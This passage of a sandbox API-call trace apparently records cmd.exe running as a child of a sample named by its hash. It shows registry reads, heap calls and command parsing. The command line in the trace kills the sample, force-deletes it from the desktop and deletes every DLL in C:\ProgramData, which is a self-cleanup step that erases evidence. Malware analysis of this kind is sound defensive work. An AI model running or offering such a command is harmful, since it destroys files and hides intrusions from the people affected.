| out: phkResult=0x44fff18*=0x0) returned 0x2 [0127.074] VirtualQuery (in: lpAddress=0x44fff1f, lpBuffer=0x44ffed0, dwLength=0x1c | out: lpBuffer=0x44ffed0*(BaseAddress=0x44ff000, AllocationBase=0x4400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.074] VirtualQuery (in: lpAddress=0x4400000, lpBuffer=0x44ffed0, dwLength=0x1c | out: lpBuffer=0x44ffed0*(BaseAddress=0x4400000, AllocationBase=0x4400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.074] VirtualQuery (in: lpAddress=0x4401000, lpBuffer=0x44ffed0, dwLength=0x1c | out: lpBuffer=0x44ffed0*(BaseAddress=0x4401000, AllocationBase=0x4400000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.074] VirtualQuery (in: lpAddress=0x4403000, lpBuffer=0x44ffed0, dwLength=0x1c | out: lpBuffer=0x44ffed0*(BaseAddress=0x4403000, AllocationBase=0x4400000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.074] VirtualQuery (in: lpAddress=0x4500000, lpBuffer=0x44ffed0, dwLength=0x1c | out: lpBuffer=0x44ffed0*(BaseAddress=0x4500000, AllocationBase=0x4500000, AllocationProtect=0x4, RegionSize=0x35000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.074] GetConsoleOutputCP () returned 0x1b5 [0127.081] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7f460 | out: lpCPInfo=0x7f460) returned 1 [0127.081] SetConsoleCtrlHandler (HandlerRoutine=0x70e40, Add=1) returned 1 [0127.081] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.081] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0127.103] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.103] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x7f40c | out: lpMode=0x7f40c) returned 1 [0127.106] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.106] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0127.195] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.195] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x7f408 | out: lpMode=0x7f408) returned 1 [0127.198] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.198] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0127.260] GetEnvironmentStringsW () returned 0x47080e8* [0127.260] GetProcessHeap () returned 0x4700000 [0127.260] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xacc) returned 0x4708bc0 [0127.261] FreeEnvironmentStringsA (penv="A") returned 1 [0127.261] GetProcessHeap () returned 0x4700000 [0127.261] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x4) returned 0x4700550 [0127.261] GetEnvironmentStringsW () returned 0x47080e8* [0127.261] GetProcessHeap () returned 0x4700000 [0127.261] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xacc) returned 0x4709698 [0127.261] FreeEnvironmentStringsA (penv="A") returned 1 [0127.261] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x44fee7c | out: phkResult=0x44fee7c*=0x94) returned 0x0 [0127.261] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x0, lpData=0x44fee88*=0x49, lpcbData=0x44fee80*=0x1000) returned 0x2 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x1, lpcbData=0x44fee80*=0x4) returned 0x0 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x0, lpData=0x44fee88*=0x1, lpcbData=0x44fee80*=0x1000) returned 0x2 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x0, lpcbData=0x44fee80*=0x4) returned 0x0 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x40, lpcbData=0x44fee80*=0x4) returned 0x0 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x40, lpcbData=0x44fee80*=0x4) returned 0x0 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x0, lpData=0x44fee88*=0x40, lpcbData=0x44fee80*=0x1000) returned 0x2 [0127.262] RegCloseKey (hKey=0x94) returned 0x0 [0127.262] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x44fee7c | out: phkResult=0x44fee7c*=0x94) returned 0x0 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x0, lpData=0x44fee88*=0x40, lpcbData=0x44fee80*=0x1000) returned 0x2 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x1, lpcbData=0x44fee80*=0x4) returned 0x0 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x0, lpData=0x44fee88*=0x1, lpcbData=0x44fee80*=0x1000) returned 0x2 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x0, lpcbData=0x44fee80*=0x4) returned 0x0 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x9, lpcbData=0x44fee80*=0x4) returned 0x0 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x9, lpcbData=0x44fee80*=0x4) returned 0x0 [0127.262] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x0, lpData=0x44fee88*=0x9, lpcbData=0x44fee80*=0x1000) returned 0x2 [0127.262] RegCloseKey (hKey=0x94) returned 0x0 [0127.263] time (in: timer=0x0 | out: timer=0x0) returned 0x6151f217 [0127.263] srand (_Seed=0x6151f217) [0127.263] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe /f & timeout /t 6 & del /f /q \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" & del C:\\ProgramData\\*.dll & exit" [0127.263] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe /f & timeout /t 6 & del /f /q \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" & del C:\\ProgramData\\*.dll & exit" [0127.263] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x87720 | out: lpBuffer="C:\\ProgramData") returned 0xe [0127.264] GetProcessHeap () returned 0x4700000 [0127.264] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x210) returned 0x47080e8 [0127.264] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x47080f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0127.264] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0127.264] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0127.264] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.264] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.264] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.264] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.265] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.265] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.265] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.265] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.265] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.265] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.265] GetProcessHeap () returned 0x4700000 [0127.265] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4708bc0) returned 1 [0127.265] GetEnvironmentStringsW () returned 0x4708300* [0127.265] GetProcessHeap () returned 0x4700000 [0127.265] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xae4) returned 0x470ac60 [0127.265] FreeEnvironmentStringsA (penv="A") returned 1 [0127.265] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0127.265] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.265] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.265] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.265] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.266] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.266] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.266] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.266] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.266] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.266] GetProcessHeap () returned 0x4700000 [0127.266] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x26) returned 0x4700578 [0127.266] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x44ffc54 | out: lpBuffer="C:\\ProgramData") returned 0xe [0127.266] GetFullPathNameW (in: lpFileName="C:\\ProgramData", nBufferLength=0x104, lpBuffer=0x44ffc54, lpFilePart=0x44ffc4c | out: lpBuffer="C:\\ProgramData", lpFilePart=0x44ffc4c*="ProgramData") returned 0xe [0127.266] GetFileAttributesW (lpFileName="C:\\ProgramData" (normalized: "c:\\programdata")) returned 0x12 [0127.266] FindFirstFileW (in: lpFileName="C:\\ProgramData", lpFindFileData=0x44ff9d0 | out: lpFindFileData=0x44ff9d0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x345eddcd, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x345eddcd, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 0x470b750 [0127.267] FindClose (in: hFindFile=0x470b750 | out: hFindFile=0x470b750) returned 1 [0127.267] _wcsnicmp (_String1="PROGRA~3", _String2="ProgramData", _MaxCount=0xb) returned 17 [0127.267] GetFileAttributesW (lpFileName="C:\\ProgramData" (normalized: "c:\\programdata")) returned 0x12 [0127.267] SetCurrentDirectoryW (lpPathName="C:\\ProgramData" (normalized: "c:\\programdata")) returned 1 [0127.267] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\ProgramData") returned 1 [0127.267] GetProcessHeap () returned 0x4700000 [0127.267] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470ac60) returned 1 [0127.267] GetEnvironmentStringsW () returned 0x470a170* [0127.267] GetProcessHeap () returned 0x4700000 [0127.267] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xb0a) returned 0x470ac88 [0127.267] FreeEnvironmentStringsA (penv="=") returned 1 [0127.267] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x87720 | out: lpBuffer="C:\\ProgramData") returned 0xe [0127.267] GetProcessHeap () returned 0x4700000 [0127.267] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4700578) returned 1 [0127.267] GetProcessHeap () returned 0x4700000 [0127.267] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x400e) returned 0x470b7a0 [0127.268] GetProcessHeap () returned 0x4700000 [0127.268] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x1fa) returned 0x4708e18 [0127.268] GetProcessHeap () returned 0x4700000 [0127.268] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b7a0) returned 1 [0127.268] GetConsoleOutputCP () returned 0x1b5 [0127.272] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7f460 | out: lpCPInfo=0x7f460) returned 1 [0127.272] GetUserDefaultLCID () returned 0x409 [0127.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x834a0, cchData=8 | out: lpLCData=":") returned 2 [0127.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x44ffd84, cchData=128 | out: lpLCData="0") returned 2 [0127.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x44ffd84, cchData=128 | out: lpLCData="0") returned 2 [0127.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x44ffd84, cchData=128 | out: lpLCData="1") returned 2 [0127.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x834b0, cchData=8 | out: lpLCData="/") returned 2 [0127.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x83500, cchData=32 | out: lpLCData="Mon") returned 4 [0127.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x83540, cchData=32 | out: lpLCData="Tue") returned 4 [0127.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x83580, cchData=32 | out: lpLCData="Wed") returned 4 [0127.274] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x835c0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.274] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x83600, cchData=32 | out: lpLCData="Fri") returned 4 [0127.274] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x83640, cchData=32 | out: lpLCData="Sat") returned 4 [0127.274] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x83680, cchData=32 | out: lpLCData="Sun") returned 4 [0127.274] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x834c0, cchData=8 | out: lpLCData=".") returned 2 [0127.274] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x834e0, cchData=8 | out: lpLCData=",") returned 2 [0127.274] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.276] GetProcessHeap () returned 0x4700000 [0127.276] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x0, Size=0x20c) returned 0x4709068 [0127.276] GetConsoleTitleW (in: lpConsoleTitle=0x4709068, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0127.276] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0127.276] GetProcAddress (hModule=0x74650000, lpProcName="CopyFileExW") returned 0x7466ffc0 [0127.276] GetProcAddress (hModule=0x74650000, lpProcName="IsDebuggerPresent") returned 0x7466b0b0 [0127.277] GetProcAddress (hModule=0x74650000, lpProcName="SetConsoleInputExeNameW") returned 0x75f9b440 [0127.277] GetProcessHeap () returned 0x4700000 [0127.277] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x400a) returned 0x470b7a0 [0127.277] GetProcessHeap () returned 0x4700000 [0127.277] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b7a0) returned 1 [0127.278] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0127.278] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0127.278] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0127.278] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0127.278] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0127.278] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0127.278] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0127.278] GetProcessHeap () returned 0x4700000 [0127.278] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x58) returned 0x4709280 [0127.278] GetProcessHeap () returned 0x4700000 [0127.278] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x1a) returned 0x4700578 [0127.281] GetProcessHeap () returned 0x4700000 [0127.281] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xa4) returned 0x47092e0 [0127.282] GetProcessHeap () returned 0x4700000 [0127.282] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x58) returned 0x4709390 [0127.283] _wcsicmp (_String1="timeout", _String2=")") returned 75 [0127.283] _wcsicmp (_String1="FOR", _String2="timeout") returned -14 [0127.283] _wcsicmp (_String1="FOR/?", _String2="timeout") returned -14 [0127.283] _wcsicmp (_String1="IF", _String2="timeout") returned -11 [0127.283] _wcsicmp (_String1="IF/?", _String2="timeout") returned -11 [0127.283] _wcsicmp (_String1="REM", _String2="timeout") returned -2 [0127.283] _wcsicmp (_String1="REM/?", _String2="timeout") returned -2 [0127.283] GetProcessHeap () returned 0x4700000 [0127.283] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x58) returned 0x47093f0 [0127.283] GetProcessHeap () returned 0x4700000 [0127.283] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x18) returned 0x4707ad0 [0127.283] GetProcessHeap () returned 0x4700000 [0127.283] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x16) returned 0x4707af0 [0127.284] GetProcessHeap () returned 0x4700000 [0127.284] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x58) returned 0x4709450 [0127.284] _wcsicmp (_String1="del", _String2=")") returned 59 [0127.284] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0127.284] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0127.285] _wcsicmp (_String1="IF", _String2="del") returned 5 [0127.285] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0127.285] _wcsicmp (_String1="REM", _String2="del") returned 14 [0127.285] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0127.285] GetProcessHeap () returned 0x4700000 [0127.285] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x58) returned 0x47094b0 [0127.285] GetProcessHeap () returned 0x4700000 [0127.285] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x10) returned 0x4709510 [0127.289] GetProcessHeap () returned 0x4700000 [0127.289] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xe2) returned 0x4709528 [0127.290] GetProcessHeap () returned 0x4700000 [0127.290] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x58) returned 0x4709618 [0127.290] _wcsicmp (_String1="del", _String2=")") returned 59 [0127.290] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0127.290] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0127.290] _wcsicmp (_String1="IF", _String2="del") returned 5 [0127.290] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0127.290] _wcsicmp (_String1="REM", _String2="del") returned 14 [0127.290] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0127.290] GetProcessHeap () returned 0x4700000 [0127.290] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x58) returned 0x47005c8 [0127.290] GetProcessHeap () returned 0x4700000 [0127.290] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x10) returned 0x4709678 [0127.291] GetProcessHeap () returned 0x4700000 [0127.291] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x36) returned 0x4700628 [0127.291] GetProcessHeap () returned 0x4700000 [0127.291] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x58) returned 0x4700668 [0127.291] _wcsicmp (_String1="exit", _String2=")") returned 60 [0127.291] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0127.291] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0127.292] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0127.292] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0127.292] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0127.292] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0127.292] GetProcessHeap () returned 0x4700000 [0127.292] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x58) returned 0x47006c8 [0127.292] GetProcessHeap () returned 0x4700000 [0127.292] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x12) returned 0x4707950 [0127.292] GetConsoleTitleW (in: lpConsoleTitle=0x44ffa10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0127.293] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0127.293] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0127.293] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0127.293] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0127.293] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0127.293] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0127.293] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0127.293] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0127.293] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0127.293] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0127.293] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0127.293] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0127.293] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0127.293] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0127.293] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0127.293] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0127.294] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0127.294] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0127.294] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0127.294] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0127.294] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0127.294] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0127.294] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0127.294] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0127.294] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0127.294] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0127.294] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0127.294] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0127.294] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0127.294] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0127.294] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0127.294] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0127.294] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0127.294] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0127.294] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0127.294] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0127.294] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0127.294] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0127.294] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0127.294] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0127.294] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0127.294] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0127.294] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0127.294] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0127.294] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0127.294] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0127.294] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0127.294] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0127.294] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0127.294] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0127.295] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0127.295] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0127.295] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0127.295] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0127.295] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0127.295] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0127.295] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0127.295] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0127.295] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0127.295] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0127.295] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0127.295] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0127.295] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0127.295] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0127.295] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0127.295] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0127.295] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0127.295] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0127.295] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0127.295] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0127.295] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0127.295] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0127.295] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0127.295] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0127.295] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0127.295] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0127.295] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0127.295] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0127.295] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0127.295] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0127.295] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0127.295] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 